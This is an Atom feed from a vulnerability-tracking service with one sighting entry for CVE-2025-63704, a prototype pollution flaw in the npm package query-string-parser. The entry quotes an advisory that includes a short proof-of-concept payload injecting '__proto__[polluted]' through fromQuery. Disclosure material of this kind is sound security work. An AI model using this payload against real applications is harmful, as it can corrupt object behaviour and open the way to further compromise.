<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en">
  <id>https://vulnerability.circl.lu/sightings/feed</id>
  <title>Most recent sightings.</title>
  <updated>2026-06-02T03:32:57.080623+00:00</updated>
  <author>
    <name>Vulnerability-Lookup</name>
    <email>info@circl.lu</email>
  </author>
  <link href="https://vulnerability.circl.lu" rel="alternate"/>
  <generator uri="https://lkiesow.github.io/python-feedgen" version="1.0.0">python-feedgen</generator>
  <subtitle>Contains only the most 10 recent sightings.</subtitle>
  <entry>
    <id>https://vulnerability.circl.lu/sighting/087a794c-efd4-48a8-91a1-dd9455f587ce/export</id>
    <title>087a794c-efd4-48a8-91a1-dd9455f587ce</title>
    <updated>2026-06-02T03:32:57.548966+00:00</updated>
    <author>
      <name>Automation user</name>
      <uri>https://cve.circl.lu/user/automation</uri>
    </author>
    <content>{"uuid": "087a794c-efd4-48a8-91a1-dd9455f587ce", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-63704", "type": "seen", "source": "https://gist.github.com/6en6ar/d62f614dbb2b1032b5e45a56fe26ec8b", "content": "Product: https://www.npmjs.com/package/query-string-parser\nVersion: v1.0.0\nVulnerability type: Prototype Pollution vulnerability inside query-string-parser through version 1.0.0\nCVE ID: CVE-2025-63704\nDiscovered: lelecolacola123, 6en6ar\n\nDescription: \nNPM package query-parser-string does not properly sanitize user supplied query parameters and merges them to the newly created object. \nThis happens inside _fillValue function inside index.js, when calling fromQuery to parse query parameters.\n\nPayload used:\n\n&amp;gt; const { toQuery, fromQuery } = require('query-string-parser')\n&amp;gt; const queryString = fromQuery(\"a=1&amp;amp;b=2&amp;amp;__proto__[polluted]=polluted\")\n&amp;gt; console.log(\"Query string object polluted: \"+queryString.__proto__.polluted)\n&amp;gt; console.log(\"POlluted object: \" + {}.polluted)\n&amp;gt; let obj = {}\n&amp;gt; console.log(\"Newly created obj: \" + obj.polluted)", "creation_timestamp": "2026-05-06T19:53:03.000000Z"}</content>
    <link href="https://vulnerability.circl.lu/sighting/087a794c-efd4-48a8-91a1-dd9455f587ce/export"/>
    <published>2026-05-06T19:53:03+00:00</published>
  </entry>
</feed>
